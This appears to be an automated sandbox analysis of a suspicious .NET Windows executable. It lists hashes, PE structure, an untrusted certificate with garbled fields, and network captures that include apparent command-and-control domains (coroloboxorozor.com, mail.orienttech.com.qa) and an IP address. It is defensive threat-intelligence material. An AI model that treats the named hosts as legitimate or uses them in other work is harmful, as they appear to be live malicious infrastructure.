                                                      SHA512:7c1c66c45e3b375d3e3819739bf32ee89fb1a7bc3623273cfd65109412ca3dde0907ec789cf331a1653f2857377e698073e02c03e3f009db67525c7862125da3
                                                      SSDEEP:384:ghiAhOVUOxO7CX5KGSKtWf0gl1QSrKHkvN9Abr8kIKFrq1ASLHqVnWA5ju61vkhG:kfhQ7bX0tKtWfIg9AniKFRnWA5nChG
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..Z...........x... ........@.. ..............................k.....@................................

                                                      File Icon

                                                      Icon Hash:00828e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4078fe
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:C=???????????????????????????????????????, S=&#229;&#184;&#135;&#229;&#184;&#129;&#229;&#183;&#180;&#229;&#184;&#148;&#229;&#184;&#131;&#229;&#184;&#142;&#229;&#184;&#130;&#229;&#183;&#175;&#229;&#184;&#137;&#229;&#184;&#146;, L=&#226;&#166;&#147;&#226;&#166;&#180;&#226;&#166;&#164;&#226;&#166;&#180;&#226;&#167;&#128;&#226;&#167;&#136;&#226;&#166;&#157;&#226;&#166;&#163;&#226;&#166;&#177;&#226;&#166;&#148;&#226;&#166;&#183;&#226;&#166;&#151;&#226;&#166;&#177;&#226;&#166;&#146;&#226;&#166;&#184;&#226;&#166;&#169;&#226;&#166;&#186;&#226;&#166;&#188;&#226;&#167;&#135;, T=&#239;&#169;&#136;&#239;&#169;&#140;&#239;&#169;&#138;&#239;&#169;&#136;&#239;&#169;&#159;&#239;&#169;&#179;&#239;&#169;&#184;&#239;&#169;&#146;&#239;&#169;&#158;&#239;&#169;&#184;&#239;&#169;&#149;&#239;&#169;&#158;&#239;&#169;&#151;&#239;&#169;&#153;&#239;&#169;&#138;&#239;&#169;&#137;, E=????????????????????????????????????????????????, OU=&#239;&#156;&#140;&#239;&#155;&#162;&#239;&#156;&#136;&#239;&#155;&#173;&#239;&#156;&#138;&#239;&#155;&#156;&#239;&#156;&#131;&#239;&#156;&#134;&#239;&#156;&#128;&#239;&#155;&#190;&#239;&#156;&#138;&#239;&#155;&#181;&#239;&#155;&#152;&#239;&#155;&#186;&#239;&#155;&#159;&#239;&#155;&#168;&#239;&#155;&#167;&#239;&#156;&#139;&#239;&#156;&#136;&#239;&#155;&#170;&#239;&#155;&#166;&#239;&#155;&#163;&#239;&#156;&#128;&#239;&#155;&#152;&#239;&#155;&#190;&#239;&#156;&#140;, O=&#233;&#181;&#184;&#233;&#181;&#139;&#233;&#181;&#132;&#233;&#181;&#133;&#233;&#181;&#148;&#233;&#181;&#173;&#233;&#181;&#140;&#233;&#181;&#131;&#233;&#181;&#173;&#233;&#181;&#141;, CN=&#238;&#164;&#167;&#238;&#163;&#187;&#238;&#164;&#134;&#238;&#164;&#158;&#238;&#164;&#145;&#238;&#163;&#185;&#238;&#164;&#137;&#238;&#164;&#133;&#238;&#164;&#170;&#238;&#164;&#145;&#238;&#163;&#179;
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 2/22/2021 10:10:05 PM 2/22/2022 10:10:05 PM
                                                      Subject Chain
                                                      • C=???????????????????????????????????????, S=&#229;&#184;&#135;&#229;&#184;&#129;&#229;&#183;&#180;&#229;&#184;&#148;&#229;&#184;&#131;&#229;&#184;&#142;&#229;&#184;&#130;&#229;&#183;&#175;&#229;&#184;&#137;&#229;&#184;&#146;, L=&#226;&#166;&#147;&#226;&#166;&#180;&#226;&#166;&#164;&#226;&#166;&#180;&#226;&#167;&#128;&#226;&#167;&#136;&#226;&#166;&#157;&#226;&#166;&#163;&#226;&#166;&#177;&#226;&#166;&#148;&#226;&#166;&#183;&#226;&#166;&#151;&#226;&#166;&#177;&#226;&#166;&#146;&#226;&#166;&#184;&#226;&#166;&#169;&#226;&#166;&#186;&#226;&#166;&#188;&#226;&#167;&#135;, T=&#239;&#169;&#136;&#239;&#169;&#140;&#239;&#169;&#138;&#239;&#169;&#136;&#239;&#169;&#159;&#239;&#169;&#179;&#239;&#169;&#184;&#239;&#169;&#146;&#239;&#169;&#158;&#239;&#169;&#184;&#239;&#169;&#149;&#239;&#169;&#158;&#239;&#169;&#151;&#239;&#169;&#153;&#239;&#169;&#138;&#239;&#169;&#137;, E=????????????????????????????????????????????????, OU=&#239;&#156;&#140;&#239;&#155;&#162;&#239;&#156;&#136;&#239;&#155;&#173;&#239;&#156;&#138;&#239;&#155;&#156;&#239;&#156;&#131;&#239;&#156;&#134;&#239;&#156;&#128;&#239;&#155;&#190;&#239;&#156;&#138;&#239;&#155;&#181;&#239;&#155;&#152;&#239;&#155;&#186;&#239;&#155;&#159;&#239;&#155;&#168;&#239;&#155;&#167;&#239;&#156;&#139;&#239;&#156;&#136;&#239;&#155;&#170;&#239;&#155;&#166;&#239;&#155;&#163;&#239;&#156;&#128;&#239;&#155;&#152;&#239;&#155;&#190;&#239;&#156;&#140;, O=&#233;&#181;&#184;&#233;&#181;&#139;&#233;&#181;&#132;&#233;&#181;&#133;&#233;&#181;&#148;&#233;&#181;&#173;&#233;&#181;&#140;&#233;&#181;&#131;&#233;&#181;&#173;&#233;&#181;&#141;, CN=&#238;&#164;&#167;&#238;&#163;&#187;&#238;&#164;&#134;&#238;&#164;&#158;&#238;&#164;&#145;&#238;&#163;&#185;&#238;&#164;&#137;&#238;&#164;&#133;&#238;&#164;&#170;&#238;&#164;&#145;&#238;&#163;&#179;
                                                      Version:3
                                                      Thumbprint MD5:882F844D38F62D70B33C89F8B3B42F12
                                                      Thumbprint SHA-1:024452A48DED5FE26DA1685D19C0A708D79CF72F
                                                      Thumbprint SHA-256:6A35C18EA225DE1AD541624DED413AF973F9B47652120445A602CBF42707BBB5
                                                      Serial:00C787C965A073F7188E620669BD861A00

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x78ac0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x3e0.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x62000x1660.text
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x59040x5a00False0.648003472222data6.81509040875IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x80000x3e00x400False0.462890625data3.51870730291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xa0000xc0x200False0.041015625data0.0611628522412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_VERSION0x80580x388dataEnglishUnited States

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      LegalCopyrightCopyright 2022 OtGrGmtX. All rights reserved.
                                                      Assembly Version2.0.0.0
                                                      InternalNameUAudJRAa.exe
                                                      FileVersion5.6.7.5
                                                      CompanyNameGufJmDYg
                                                      LegalTrademarksPipcRtfK
                                                      CommentsOYCJFaen
                                                      ProductNameUAudJRAa
                                                      ProductVersion2.0.0.0
                                                      FileDescriptionPSnwJvyK
                                                      OriginalFilenameUAudJRAa.exe
                                                      Translation0x0409 0x0514

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Feb 23, 2021 09:31:55.365534067 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.419498920 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.419733047 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.421120882 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.473939896 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522285938 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522311926 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522329092 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522346020 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522362947 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522394896 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522416115 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522416115 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.522437096 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522459984 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522486925 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.522500038 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.522510052 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.522548914 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.523546934 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.523591995 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.523659945 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.524774075 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.524811983 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.524888992 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.526022911 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.526061058 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.526165962 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.527287006 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.527323961 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.527388096 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.528487921 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.528526068 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.528582096 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.529700994 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.529745102 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.529813051 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.531016111 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.531054974 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.531116962 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.532171965 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.532208920 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.532284975 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.533441067 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.533478975 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.533586025 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.534662962 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.534698963 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.535109043 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.577127934 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.577382088 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.577446938 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.577450037 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.578651905 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.578690052 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.578715086 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.579884052 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.579921007 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.579961061 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.581100941 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.581135988 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.581172943 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.582341909 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.582379103 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.582408905 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.584508896 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.584544897 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.584582090 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.584772110 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.584798098 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.584834099 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.586030960 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.586067915 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.586086988 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.587313890 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.587351084 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.587388992 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.588530064 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.588566065 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.588607073 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.589809895 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.589840889 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.589889050 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.591028929 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.591110945 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.591577053 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.591618061 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.591686964 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.592833996 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.592886925 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.592935085 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.594082117 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.594115973 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.594165087 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.595326900 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.595365047 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.595403910 CET4973180192.168.2.4172.67.172.17
                                                      Feb 23, 2021 09:31:55.596564054 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.596601009 CET8049731172.67.172.17192.168.2.4
                                                      Feb 23, 2021 09:31:55.596663952 CET4973180192.168.2.4172.67.172.17

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Feb 23, 2021 09:31:46.810556889 CET4971453192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:46.859141111 CET53497148.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:31:47.039196968 CET5802853192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:47.087939024 CET53580288.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:31:47.716562986 CET5309753192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:47.768197060 CET53530978.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:31:49.358711958 CET4925753192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:49.415843010 CET53492578.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:31:50.278305054 CET6238953192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:50.329797983 CET53623898.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:31:50.823911905 CET4991053192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:50.882304907 CET53499108.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:31:55.273324013 CET5585453192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:55.335468054 CET53558548.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:31:56.667977095 CET6454953192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:56.719338894 CET53645498.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:31:57.637877941 CET6315353192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:31:57.686521053 CET53631538.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:01.356560946 CET5299153192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:01.405291080 CET53529918.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:02.548392057 CET5370053192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:02.599906921 CET53537008.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:03.818628073 CET5172653192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:03.870130062 CET53517268.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:05.029747963 CET5679453192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:05.078617096 CET53567948.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:06.247302055 CET5653453192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:06.296017885 CET53565348.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:07.379823923 CET5662753192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:07.431444883 CET53566278.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:08.375817060 CET5662153192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:08.433149099 CET53566218.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:09.566751957 CET6311653192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:09.615370989 CET53631168.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:13.410522938 CET6407853192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:13.463491917 CET53640788.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:17.755178928 CET6480153192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:17.804676056 CET53648018.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:18.681122065 CET6172153192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:18.729921103 CET53617218.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:19.444901943 CET5125553192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:19.496496916 CET53512558.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:20.919595003 CET6152253192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:20.971292973 CET53615228.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:37.528866053 CET5233753192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:37.580564022 CET53523378.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:38.476026058 CET5504653192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:38.524744034 CET53550468.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:41.844392061 CET4961253192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:41.903660059 CET53496128.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:42.007838964 CET4928553192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:42.065799952 CET53492858.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:42.580985069 CET5060153192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:42.652038097 CET53506018.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:43.635890961 CET6087553192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:43.696485996 CET53608758.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:44.345980883 CET5644853192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:44.406274080 CET53564488.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:44.869745016 CET5917253192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:44.929609060 CET53591728.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:44.980477095 CET6242053192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:45.052990913 CET53624208.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:45.445525885 CET6057953192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:45.502540112 CET53605798.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:46.060790062 CET5018353192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:46.118223906 CET53501838.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:46.719317913 CET6153153192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:46.777683973 CET53615318.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:47.794459105 CET4922853192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:47.851723909 CET53492288.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:50.070044041 CET5979453192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:50.135446072 CET53597948.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:50.722119093 CET5591653192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:50.789313078 CET53559168.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:32:50.850657940 CET5275253192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:32:50.913300037 CET53527528.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:33:03.658575058 CET6054253192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:33:03.717711926 CET53605428.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:33:38.864717007 CET6068953192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:33:38.914076090 CET53606898.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:33:39.884452105 CET6420653192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:33:39.936356068 CET53642068.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:33:46.507957935 CET5090453192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:33:46.556616068 CET53509048.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:33:49.246140957 CET5752553192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:33:49.311268091 CET53575258.8.8.8192.168.2.4
                                                      Feb 23, 2021 09:33:58.246351004 CET5381453192.168.2.48.8.8.8
                                                      Feb 23, 2021 09:33:58.435498953 CET53538148.8.8.8192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Feb 23, 2021 09:31:55.273324013 CET192.168.2.48.8.8.80xe96Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:32:41.844392061 CET192.168.2.48.8.8.80x5179Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:32:50.850657940 CET192.168.2.48.8.8.80x632fStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:33:58.246351004 CET192.168.2.48.8.8.80x62beStandard query (0)mail.orienttech.com.qaA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
